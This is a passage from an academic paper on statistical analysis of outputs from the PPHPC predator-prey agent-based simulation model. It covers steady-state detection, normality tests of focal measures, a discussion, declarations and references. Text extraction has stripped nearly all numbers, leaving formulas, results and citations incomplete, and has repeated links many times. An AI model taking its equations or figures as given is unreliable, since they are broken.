/peerj-cs. where w, the window, is a positive integer such that w ⌊m/ ⌋. this value should be large enough such that the plot of xi(w) is moderately smooth, but not any larger. a more in-depth discussion of this procedure is available in welch ( ) and law ( ). statistical analysis of focal measures let y ,y ,...,yn be iid observations of some fm with finite population mean µ and finite population variance σ (i.e. any column under ‘focal measures’ in table ). then, as described by law ( ) and law ( ), unbiased point estimators for µ and σ are given by y (n) = n j= yj n ( ) and s (n) = n j= [yj −y (n)] n− ( ) respectively. another common statistic usually determined for a given fm is the confidence interval (ci) for y (n), which can be defined in several different ways. the t-distribution ci is commonly used for this purpose (law, ; law, ), although it has best coverage for normally distributed samples, which is often not the case for simulation models in general (sargent, ; law, ) and agent-based models in particular (helbing & balietti, ). if samples are drawn from populations with multimodal, discrete or strongly skewed distributions, the usefulness of t-distribution cis is further reduced. while there is not much to do in the case of multimodal distributions, law ( ) proposes the use of the ci developed by willink ( ), which takes distribution skewness into account. furthermore, cis for discrete distributions are less studied and usually assume data follows a binomial distribution, presenting some issues of its own (brown, cai & dasgupta, ). as suggested by radax & rengs ( ), we focus on providing a detailed assessment of the distributional properties of the different fms, namely whether they are sufficiently “normal” such that normality-assuming (parametric) statistical techniques can be applied, not only for ci estimation, but also for model comparison purposes. the normality of a data set can be assessed graphically or numerically (park, ). the former approach is intuitive, lending itself to empirical interpretation by providing a way to visualize how random variables are distributed. the latter approach is a more objective and quantitative form of assessing normality, providing summary statistics and/or statistics tests of normality. in both approaches, specific methods can be either descriptive or theory-driven, as shown in table . for this study we chose one method of each type, as shown in boldface in table . this approach not only provides a broad overview of the distribution under study, but is also important because no single method can provide a complete picture of the distribution. under the graphical methods umbrella, a histogram shows the approximate dis- tribution of a data set, and is built by dividing the range of values into a sequence of fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table methods for assessing the normality of a data set, adapted from park ( ). boldface methods are used in this study. graphical methods numerical methods descriptive histogram, box plot, dot plot skewness, kurtosis theory-driven q–q plot, p-p plot shapiro-wilk, anderson-darling, cramer-von mises, kolmogorov-smirnov, jarque-bera and other tests intervals (bins), and counting how many values fall in each interval. a q–q plot compares the distribution of a data set with a specific theoretical distribution (e.g., the normal distribution) by plotting their quantiles against each other (thus “q–q”). if the two distributions match, the points on the plot will approximately lie on the y = x line. while a histogram gives an approximate idea of the overall distribution, the q–q plot is more adequate to see how well a theoretical distribution fits the data set. concerning numerical methods, skewness measures the degree of symmetry of a probability distribution about its mean, and is a commonly used metric in the analysis of simulation output data (sargent, ; nakayama, ; law, ). if skewness is positive, the distribution is skewed to the right, and if negative, the distribution is skewed to the left. symmetric distributions have zero skewness, however, the converse is not necessarily true, e.g., skewness will also be zero if both tails of an asymmetric distribution account for half the total area underneath the probability density function. in the case of theory-driven nu- merical approaches, we select the shapiro-wilk (sw) test (shapiro & wilk, ), as it has been shown to be more effective when compared to several other normality tests (razali & wah, ). we focus on the p-value of this test (instead of the test’s own w statistic), as it is an easily interpretable measure. the null-hypothesis of this test is that the data set, or sample, was obtained from a normally distributed population. if the p-value is greater than a predetermined significance level α, usually . or . , then the null hypothesis cannot be rejected. conversely, a p-value less than α implies the rejection of the null hypothesis, i.e., that the sample was not obtained from a normally distributed population. results a total of replications, r = ,..., , were performed with netlogo . . for each combination of model sizes (table ) and parameters sets (table ). each replication r was performed with a prng seed obtained by taking the md checksum of r and converting the resulting hexadecimal string to a -bit integer (the maximum precision accepted by netlogo), guaranteeing some independence between seeds, and consequently, between replications. the list of seeds is provided in table s . determining the steady-state truncation point using welch’s method, we smoothed the averaged outputs using a moving average filter with w = . having experimented with other values, w = seemed to be a good compromise between rough and overly smooth plots. fig. shows results for model size and both parameter sets. following the recommendations described in section fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure moving average of outputs for model size with w = . other model sizes produce similar results, apart from a vertical scaling factor. the dashed vertical line corresponds to iteration l after which the output is considered to be in steady-state. (a) population moving average, param. set . (b) energy moving average, param. set . (c) population moving average, param. set . (d) energy moving average, param. set . ‘methodology’, we select the steady-state truncation point to be l = , for parameter set , and l = , for parameter set . these are round values which appear to occur after the transient stage. other model sizes produce similar results, apart from a vertical scaling factor, which means that these values of l are also applicable in those cases. analyzing the distributions of focal measures the six statistic summaries for each fm, namely mean, sample variance, p-value of the sw test, skewness, histogram and q–q plot, are shown in tables s . –s . for all model size and parameter set combinations. the number of bins in the histograms is set to the minimum between (an appropriate value for a sample size of ) and the number of unique values in the data set. much of the information provided in tables s . –s . , namely the p-value of the sw test, the skewness, and the q–q plots, is geared towards continuous distributions. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table histograms for the several size@set combinations of the arg maxpsi fm. set size , however, fms taken from arg max and arg min operators only yield integer (discrete) values, which correspond to specific iterations. the same is true for max and min of population outputs, namely psi , p w i , and p c i . this can be problematic for statistic summaries taken from integer-valued fms with a small number of unique values. for example, the sw test will not be very informative in such cases, and cannot even be performed if all observations yield the same value (e.g., arg max of pci for @ , table s . ). nonetheless, distributional properties of a fm can dramatically change for different model size and parameter set combinations. for example, for parameter set , observations of the arg max of pci span many different values for model size (table s . ), while for size , (table s . ) they are limited to only three different values. summary statistics appropriate for continuous distributions could be used in the former case, but do not provide overly useful information in the latter. in order to maintain a consistent approach, our discussion will continue mainly from a continuous distribution perspective, more specifically by analyzing how closely a given fm follows the normal distribution, though we superficially examine its discrete nature when relevant. distribution of focal measures over the several size@set combinations in the next paragraphs we describe the distributional behavior of each fm, and when useful, repeat in a compact fashion some of the information provided in tables s . –s . . maxpsi . the sw p-value is consistently above the % significance level, skewness is usually low and with an undefined trend, and the q–q plots mostly follow the y = x line. although there are borderline cases, such as @ and , @ , the summary statistics show that the maximum prey population fm generally follows an approximately normal distribution. arg maxpsi . this fm follows an approximately normal distribution for smaller sizes of parameter set , but as model size grows larger, the discrete nature of the data clearly stands out. this behavior is more pronounced for parameter set (which yields simulations inherently larger than parameter set ), such that, for , @ , all observations yield the same value (i.e., ). table shows, using histograms, how the distribution qualitatively evolves over the several size@set combinations. minpsi . two very different behaviors are observed for the two parameter sets. in the case of parameter set , this fm has a slightly negatively skewed distribution, with some p-values below the . significance threshold, but is otherwise not very far from normality fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table q–q plots for the several size@set combinations of the arg maxpwi fm. set size , (this is quite visible in some histograms). however, for parameter set , the data is more concentrated on a single value, more so for larger sizes. note that this single value is the initial number of prey, which means that, in most cases, the minimum number of prey never drops below its initial value. arg minpsi . this fm follows a similar pattern to the previous one, but more pronounced in terms of discreteness, namely for parameter set . for parameter set , sizes and , the distribution is bimodal, with the minimum prey population occurring at iteration zero (i.e. initial state) or around iteration , while for larger sizes, the minimum always occurs at iteration zero. psi ss . the prey population steady-state mean seems to generally follow a normal distribution, the only exception being @ , in which some departure from normality is observed, as denoted by a sw p-value below . and a few outliers in the q–q plot. sss(psi ). for most size@set combinations this fm does not present large departures from normality. however, skewness is always positive. maxpwi . this fm presents distributions which are either considerably skewed or relatively normal. the former tend to occur for smaller model sizes, while the latter for larger sizes, although this trend is not totally clear. the @ sample is a notable case, as it closely follows a normal distribution, with a symmetric histogram, approximately linear q–q plot, and a sw p-value of . . arg maxpwi . interestingly, for parameter set , this fm seems to follow a uniform distribution. this is more or less visible in the histograms, but also in the q–q plots, because when we plot uniform data points against a theoretical normal distribution in a q–q plot we get the “stretched-s” pattern which is visible in this case (table ). for parameter set , the distribution seems to be more normal, or even binomial as the discreteness of the data starts to stand-out for larger model sizes; the only exception is for size , which presents a multimodal distribution. minpwi . the minimum predator population seems to follow an approximately normal distribution, albeit with a slight positive skewness, except for @ , which has negative skewness. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. arg minpwi . this fm displays an approximately normal distribution. however, for larger simulations (i.e. mainly for parameter set ) the discrete nature of the data becomes more apparent. pwi ss . the steady-state mean of predator population apparently follows a normal distribution. this is confirmed by all summary statistics, such as the sw p-value, which is above . for all size@set combinations. sss(pwi ). departure from normality is not large in most cases ( @ and @ are exceptions, although the former due to a single outlier), but the trend of positive skewness is again observed for this statistic. maxpci . the maximum available cell-bound food seems to have a normal distribution, although @ has a few outliers which affect the result of the sw p-value (which, nonetheless, is above . ). arg maxpci . the behavior of this fm is again quite different between parameter sets. for the first parameter set, the discrete nature of the underlying distribution stands out, with no more than three unique values for size , down to a single value for larger sizes, always centered around the value (i.e. the maximum available cell-bound food tends to occur at iteration ). for the second parameter set, distribution is almost normal for sizes above , centered around iteration , although its discreteness shows for larger sizes, namely for size , , which only presents three distinct values. for size , most values fall in iteration , although two outliers push the mean up to . . minpci . this fm displays an apparently normal distribution for all model sizes and parameter sets, with the exception of @ , which has a few outliers at both tails of the distribution, bringing down the sw p-value barely above the % significance level. arg minpci . in this case, the trend is similar for both parameter sets, i.e. the distribution seems almost normal, but for larger sizes the underlying discreteness becomes apparent. this is quite clear for parameter set , as shown in table , where the sw test p-value decreases as the discreteness becomes more visible in the histograms and q–q plots. pci ss . for this fm there is not a significant departure from normality. the only exception is for @ , but only due to a single outlier. sss(pci ). like in previous cases, the steady-state sample standard deviation does not stray too far from normality, but consistently shows a positive skewness. maxe s i . for sizes and of both parameter sets, the maximum of the mean prey energy presents a positively skewed, lognormal-like distribution. for larger sizes, distributions tend to be more normal-like. this trend is clear when analyzing how the p-value of the sw test and the skewness vary for the several size@set combinations, as shown in table , namely for sizes and , where the former is smaller while the absolute value of the latter is larger. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table three statistical summaries for the several sizes of the arg minpci fm for parameter set . row ‘sw’ contains the sw test p-values, while the corresponding histograms and q–q plots are in rows ‘hist.’ and ‘q–q’, respectively. set size , sw . . . . < . hist. q–q table p-values for the sw test (row ‘sw’) and skewness (row ‘skew.’) for the several size@set combinations of the maxe s i fm. set stat. size , sw . . . . . skew. . . . − . . sw < . . . . . skew. . . − . − . . arg maxe s i . for parameter set , the distribution is approximately normal for smaller sizes, with the underlying discreteness becoming apparent for larger sizes, centering around iteration . for parameter set , the data set revolves around a limited set of unique values (centered at iteration ), following a poisson-like distribution, except for size , which displays a bimodal behavior. mine s i . this fm seems to follow an approximately normal distribution. arg mine s i . in the case of parameter set , this fm has distributions with a single value: zero. this means that the minimum mean prey energy occurs at the initial state of the simulation. from there onwards, mean prey energy is always higher. the situation is notably different for the second parameter set, where minimum mean prey energy can occur at several different iterations centered around iteration . distribution seems to be binomial or poisson-like. e s i ss . although the histograms are not very clear, the q–q plots and the p-values from the sw test suggest that this fm follows a normal distribution. sss(e s i ). this fm does not seem to stray much from normality, except in the case of , @ and @ , which are affected by outliers. the tendency for the steady-state sample standard deviation statistic to show positive skewness is again confirmed with these observations ( @ being the exception). fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. maxe w i . the maximum of mean predator energy follows an approximately normal distribution, though for @ there are a few replications which produce unexpected results. arg maxe w i . in most cases, this fm approximately follows a normal distribution. there are several exceptions though. for the second parameter set and sizes above , the fm starts to display its discrete behavior, following a poisson-like distribution. less critically, an outlier “ruins” normality for @ . mine w i . apart from a few outliers with some parameter combinations, this fm generally seems to follow a normal distribution. arg mine w i . perhaps with the exception of @ and @ , the iteration where the minimum of mean predator energy occurs seems best described with a discrete, poisson-like distribution. e w i ss . this fm generally follows a normal distribution. however, , @ shows a salient second peak (to the right of the histogram, also visible in the q–q plot), affecting the resulting sw p-value, which is below the % significance threshold. sss(e w i ). this fm follows a positively skewed unimodal distribution, in the same line as the steady-state sample standard deviation of other outputs. note the outlier in @ , also observed for the sss(pwi ) fm, which is to be excepted as both fms are related to predator dynamics. maxci. the samples representing the maximum of the mean c state variable are most likely drawn from a normal distribution. most histograms are fairly symmetric (which is corroborated by the low skewness values), the q–q plots are generally linear, and the sw p-value never drops below . significance. arg maxci. for smaller model sizes this fm follows a mostly normal distribution, but as with other iteration-based fms, the underlying discreteness of the distribution starts to show at larger model sizes, especially for the second parameter set. minci. for most size@set combinations, the minimum of the mean c state variable seems to be normally distributed. nonetheless, a number of observations for @ yield unexpected values, making the respective distribution bimodal and distorting its normality (though the respective sw p-value does not drop below . ). arg minci. as in some previous cases, this fm displays different behavior depending on the parameter set. for the first parameter set, practically all observations have the same value, , which means the minimum of the mean c state variable is obtained at iteration . only model sizes and have some observations representing iterations and/or . parameter set yields a different dynamic, with an average iteration of approximately (except for size , which has an average iteration of . due to a few very fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table empirical classification (from to ) of each fm according to how close it follows the normal distribution for the tested size@set combinations. the last row outlines the overall normality of each statistic. xi stat. max ≤i≤m xi arg max ≤i≤mxi min ≤i≤m xi arg min ≤i≤mxi x ss sss psi ••••• ••⃝⃝⃝ ••◐⃝⃝ ⃝⃝⃝⃝⃝ ••••• ••••◐ pwi ••••⃝ •◐⃝⃝⃝ ••••• •••⃝⃝ ••••• ••••◐ pci ••••• ◐⃝⃝⃝⃝ ••••• •••⃝⃝ ••••• ••••◐ e s i ••••⃝ •⃝⃝⃝⃝ ••••• ◐⃝⃝⃝⃝ ••••• ••••◐ e w i ••••• •••⃝⃝ ••••• ◐⃝⃝⃝⃝ ••••• ••••⃝ ci ••••• ••◐⃝⃝ ••••• ⃝⃝⃝⃝⃝ ••••• ••••◐ stat. wise ••••◐ ••⃝⃝⃝ ••••◐ •⃝⃝⃝⃝ ••••• ••••◐ distant outliers). while sizes and follow an approximately normal distribution, larger sizes seem more fit to be analyzed using discrete distributions such as poisson or binomial. ci ss . this fm follows an approximately normal distribution. while most size/parameter combinations have a few outliers, only for @ is the existing outlier capable of making the sw test produce a p-value below the % significance threshold. sss(ci). although passing the sw normality test (p-value > . ) in most cases, we again note the positive skewness of the steady-state sample standard deviation samples, suggesting that distributions such as weibull or lognormal maybe a better fit. statistics-wise distribution trends table summarizes the descriptions given in the previous section. it was built by assigning an empirical classification from to to each fm according to how close it follows the normal distribution for the tested size@set combinations. more specifically, individual classifications were determined by analyzing the information provided in tables s . –s . , prioritizing the sw test result (i.e. if the p-value is above . and/or . ) and distributional discreteness (observable in the q–q plots). this classification can be used as a guide to whether parametric or non-parametric statistical methods should be used to further analyze the fms or to compare fms of different pphpc implementations. the last row shows the average classification of individual outputs for a given statistic, outlining its overall normality. the max and min statistics yield mostly normal distributions, although care should be taken when the maximum or minimum systematically converge to the same value, e.g., when they occur at iteration zero. nonetheless, parametric methods seem adequate for fms drawn from these statistics. the same does not apply to the arg max and arg min statistics, which show a large variety of distributional behaviors (including normality in some cases). thus, these statistics are better handled with non-parametric techniques. the steady-state mean typically displays distributions very close to normal, probably due to central-limit-theorem type effects, as described by law ( ) for mean or average-based fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. fms. consequently, parametric methods will most likely be suitable for this statistic. finally, fms based on the steady-state sample standard deviation display normal-like behavior, albeit with consistently positive skewness; in fact, they are probably better represented by a weibull or lognormal distribution. while parametric methods may be used for this statistic, results should be interpreted cautiously. discussion in this paper, the pphpc model is completely specified, and an exhaustive analysis of the respective simulation outputs is performed. regarding the latter, after determining the mean and variance of the several fms, we opted to study their distributional properties instead of proceeding with the classical analysis suggested by simulation output analysis literature (i.e., the establishment of cis.). this approach has a number of practical uses. for example, if we were to estimate cis for fms drawn from the steady-state mean, we could use t-distribution cis with some confidence, as these fms display an approximately normal distribution. if we did the same for fms drawn from the steady-state sample standard deviation, the willink ( ) ci would be preferable, as it accounts for the skewness displayed by these fms. estimating cis without a good understanding of the underlying distribution can be misleading, especially if the distribution is multimodal. the approach taken here is also useful for comparing different pphpc implementations. if we were to compare max or min-based fms, which seem to follow approximately normal distributions, parametric tests such as the t-test would most likely produce valid conclusions. on the other hand, if we compare arg max or arg min-based fms, non-parametric tests, such as the mann-whitney u test (gibbons & chakraborti, ), would be more adequate, as these fms do not usually follow a normal distribution. however, the scope of the pphpc model is significantly broader. for example, in fachada et al. ( b), pphpc is reimplemented in java with several user-selectable parallelization strategies. the goal is to clarify which are the best parallelization approaches for sabms in general. a n-sample statistical test is applied to each fm, for all implemen- tations and strategies simultaneously, in order to verify that these do not yield dissimilar results. in fachada et al. ( a), pphpc is used for presenting a novel model-independent comparison technique which directly uses simulation outputs, bypassing the need of selecting model-specific fms. the pphpc model is made available to other researchers via the source code, in addition to the specification presented here. all the data analyzed in this paper is also available as supplemental information. pphpc can be used as a pure computational model without worrying with aspects like visualization and user interfaces, allowing for direct performance comparison of different implementations. conclusion in this paper, we presented pphpc, a conceptual model which captures important charac- teristics of sabms. the model was comprehensively described using the odd protocol, a netlogo canonical implementation was reported, and simulation outputs were thoroughly studied from a statistical perspective for two parameter sets and several model sizes. while fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. many abms have been published, proper model description and analysis is lacking in the scientific literature, and thus this paper can be seen as a guideline or methodology to improve model specification and communication in the field. furthermore, pphpc aims to be a standard model for research in agent-based modeling and simulation, such as, but not limited to, statistical model comparison techniques, performance comparison of parallel implementations, and testing the influence of different prngs on the statistical accuracy of simulation output. additional information and declarations funding this work was supported by the fundação para a ciência e a tecnologia (fct) projects uid/eea/ / , uid/mat/ / and (p. rd ) incen- tivo/eei/la / , and partially funded with grant sfrh/bd/ / , also from fct. the author vitor v. lopes acknowledges the financial support from the prometeo project of senescyt (ecuador). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fundação para a ciência e a tecnologia (fct): uid/eea/ / , uid/mat/ / , incentivo/eei/la / , sfrh/bd/ / . senescyt: prometeo project. competing interests the authors declare there are no competing interests. author contributions • nuno fachada conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • vitor v. lopes conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • rui c. martins analyzed the data, reviewed drafts of the paper. • agostinho c. rosa contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/fakenmc/pphpc/tree/netlogo. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references axtell r, axelrod r, epstein jm, cohen md. . aligning simulation models: a case study and results. computational and mathematical organization theory ( ): – doi . /bf . bigbee a, cioffi-revilla c, luke s. . replication of sugarscape using mason. in: terano t, kita h, deguchi h, kijima k, eds. agent-based approaches in economic and social complex systems iv, springer series on agent based social systems, vol. . tokyo: springer, – . brown ld, cai tt, dasgupta a. . interval estimation for a binomial proportion. statistical science ( ): – . d’souza r, lysenko m, rahmani k. . sugarscape on steroids: simulating over a million agents at interactive rates. in: proceedings of agent conference, chicago, usa. available at http:// www.me.mtu.edu/∼rmdsouza/papers/ /sugarscape gpu.pdf. edmonds b, hales d. . replication, replication and replication: some hard lessons from model alignment. journal of artificial societies and social simulation ( ): . epstein j, axtell r. . growing artificial societies: social science from the bottom up. cambridge: mit press. fachada n. . agent-based simulation of the immune system. master’s thesis, instituto superior técnico, universidade técnica de lisboa, lisboa. fachada n, lopes vv, martins rc, rosa ac. a. model-independent comparison of simulation output. arxiv preprint. arxiv: . . fachada n, lopes vv, martins rc, rosa ac. b. parallelization strategies for spatial agent-based models. arxiv preprint. arxiv: . . gibbons jd, chakraborti s. . nonparametric statistical inference. new york: springer. ginovart m. . discovering the power of individual-based modelling in teaching and learning: the study of a predator-prey system. journal of science education and technology ( ): – doi . /s - - - . goldsby me, pancerella cm. . multithreaded agent-based simulation. in: proceedings of the winter simulation conference: simulation: making decisions in a complex world, wsc’ . washington, d.c.: ieee press, – . grimm v, berger u, deangelis d, polhill j, giske j, railsback s. . the odd protocol: a review and first update. ecological modelling ( ): – doi . /j.ecolmodel. . . . helbing d, balietti s. . how to do agent-based simulations in the future: from modeling social mechanisms to emergent phenomena and interactive systems design. in: social self-organization, agent-based modeling. new york: springer, – . hiebeler d. . the swarm simulation system and individual-based modeling. sfi working paper: - - . isaac ag. . the abm template models: a reformulation with reference implementations. journal of artificial societies and social simulation ( ): doi . /jasss. . kahn k. . comparing multi-agent models composed from micro-behaviours. in: rouchier j, cioffi-revilla c, polhill g, takadama k, eds. m m : third international model-to-model workshop, marseilles, france. kelton wd. . statistical analysis of simulation output. in: proceedings of the th conference on winter simulation, wsc’ . piscataway: ieee computer society, – . law am. . statistical analysis of simulation output data. operations research ( ): – doi . /opre. . . . fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /bf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf 